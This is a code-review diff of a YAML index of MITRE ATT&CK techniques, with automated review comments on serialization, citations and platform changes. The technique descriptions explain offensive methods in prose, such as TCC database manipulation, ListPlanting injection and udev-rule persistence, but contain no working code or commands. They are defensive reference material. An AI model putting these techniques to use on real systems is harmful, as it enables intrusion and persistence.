+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
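Review bot: the new TCC Manipulation description switches from a double-quoted scalar to a `|+` block scalar, and `|+` keeps the trailing blank line, so the description string now ends in two newlines; the other block-scalar descriptions in this file use `|-` (see T1574.002 and T1546.017). The upstream sentence `and an overwrites file (if connected to an MDM)` also reads oddly; if this is a generated index it must stay as upstream wrote it, but the wording is worth raising with the ATT&CK maintainers.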
@@ -23065,6 +23327,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23072,7 +23336,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23102,7 +23366,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23148,7 +23411,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23193,8 +23456,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
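Review bot: for T1055.008 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing replacing the latter, whereas most other objects in this diff keep `x_mitre_attack_spec_version` (for example T1098.002 at 3.2.0). T1037.001 and T1574.012 lose the key the same way later on. If the generator drops the key whenever the upstream object lacks it, fine, but confirm this is not a serialization bug that only hits objects still at spec 2.1.0.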
@@ -23220,7 +23481,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23246,59 +23507,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
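Review bot: the T1055.015 object is being re-serialized with a different key order: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and reappear at the end of the object in the next two hunks, which hides the real content change (the added `(Citation: Hexacorn Listplanting)` and the re-wrapped description). If the generator can emit keys in a stable order, land that in a separate commit so the data update reviews cleanly.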
@@ -23315,6 +23545,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23329,21 +23562,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
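Review bot: the new `Hexacorn Listplanting` reference resolves the `(Citation: Hexacorn Listplanting)` added to the T1055.015 description in the earlier hunk, and `revoked: false` is newly present on the object. The `external_references` list is also reordered (Hexacorn, ESET, Microsoft, Modexp instead of Microsoft, Modexp, ESET), which is harmless for citation lookup but adds to the noise of this re-serialization.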
@@ -23388,9 +23652,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
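Review bot: for T1484 the `SaaS` platform is removed outright rather than renamed, leaving `Windows` and `Identity Provider`. Unlike the Office 365 and Google Workspace to Office Suite mapping elsewhere in this diff, this narrows the technique's platform coverage, so confirm it matches the upstream object at version 3.1 and that any SaaS-specific index is regenerated.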
@@ -23447,8 +23710,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23457,7 +23720,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23499,7 +23761,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23524,12 +23786,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23569,8 +23830,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
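Review bot: `x_mitre_attack_spec_version: 3.2.0` is added here between `kill_chain_phases` and `x_mitre_contributors`, and `x_mitre_modified_by_ref` is added two hunks later after `x_mitre_is_subtechnique`; both keys are then removed from the end of the object, so this is a key move, not new metadata. The only genuine addition in this hunk is the `Arun Seelagan, CISA` contributor.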
@@ -23578,13 +23841,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -23615,9 +23878,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
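Review bot: T1078.004 is the only technique in this diff that carries an atomic test (`Creating GCP Service Account and Service Account Key`). With `Azure AD`, `Office 365` and `Google Workspace` dropped from its platforms in the previous hunk, the per-platform CSV indexes that list this test by platform will change; make sure they are regenerated in the same PR so the technique index and the CSV indexes stay in step.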
@@ -23680,10 +23940,10 @@ privilege-escalation:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -23746,7 +24006,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -23780,8 +24040,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -23790,6 +24050,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
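Review bot: the new `Malicious Life by Cybereason` reference URL carries a `#blog-subscribe` fragment, which points at the page's subscription widget rather than the article; drop the fragment so the reference resolves to the content the T1053.002 description cites. The citation key matches the `(Citation: Malicious Life by Cybereason)` marker added to that description earlier in this diff, so the citation itself resolves.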
@@ -23802,7 +24066,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -23905,9 +24168,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
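Review bot: in the new T1546.017 object, `x_mitre_detection` formats `/etc/udev/rules.d/` and `/lib/udev/rules.d/` in backticks but leaves `/usr/lib/udev/rules.d/` bare, and the single-quoted scalar ends with a trailing space before the closing quote (`2024) '`). Both are inherited from the upstream text; if the index is hand-maintained they are worth normalising, otherwise report them upstream. The technique ships with `atomic_tests: []`, which is expected for an entry added only by the data refresh.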
@@ -23943,7 +24264,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23967,12 +24288,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24056,11 +24376,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24112,9 +24431,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24163,7 +24481,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24201,30 +24519,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
